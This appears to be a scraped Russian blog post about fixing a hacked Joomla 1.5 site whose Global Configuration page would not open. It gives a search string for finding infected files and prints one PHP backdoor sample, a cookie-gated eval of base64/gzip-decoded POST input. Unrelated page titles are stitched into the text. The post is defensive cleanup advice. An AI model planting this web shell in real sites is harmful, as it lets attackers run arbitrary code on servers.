Статьи

Не открываются «Общие настройки»/Global Configuration (index.php?option=com_config) / Вопросы по Joomla / WMDN

Опубликовано: 04.11.2017

видео Не открываются «Общие настройки»/Global Configuration (index.php?option=com_config) / Вопросы по Joomla / WMDN

Меню настройки SMS и MMS сообщений в смартфоне Lenovo

На днях столкнулся с такой проблемой на одном из старых сайтов на Joomla 1.5.26. Как оказалось решение этой проблемы заняло чуть более 5 минут.



Заранее скажу, что дело было во взломе, и далее буду примеры вредоносного кода, метод их поиска и общие выводы насчет безопасности.

Перерыв массу постов на форуме joomla.org, я пришел к выводу, что дело конечно же в турецких хакерах, и, соответственно стал искать их следы. Обычно зараженные файлы легко находятся с помощью Total Commander по подстроке @base64_decode(@str_replace (соответственно их впоследствии удобно удалить с помощью кнопки «Файлы на панель»).

Krita: Окно настройки кистей, общие настройки

Так вот тут я приведу куски вредоносного кода, которые возможно еще кому-то помогут найти все вредоносные скрипты. У меня такие куски были примерно двух типов:

<?php if ( ! empty ( $_COOKIE [ '__utma' ] ) and substr ( $_COOKIE [ '__utma' ] , 0 , 16 ) == '3469825000034634' ) { if ( ! empty ( $_POST [ 'msg' ] ) and $msg [email protected] gzinflate ( @ base64_decode ( @ str_replace ( ' ' , '' , urldecode ( $_POST [ 'msg' ] ) ) ) ) ) { echo '<textarea id=areatext>' ; eval ( $msg ) ; echo '</textarea>bg' ; exit ; } } ?>

в файлах с названиями типа таких 0bc11c.php/3716.php.


Общие настройки Youtube канала. Часть 1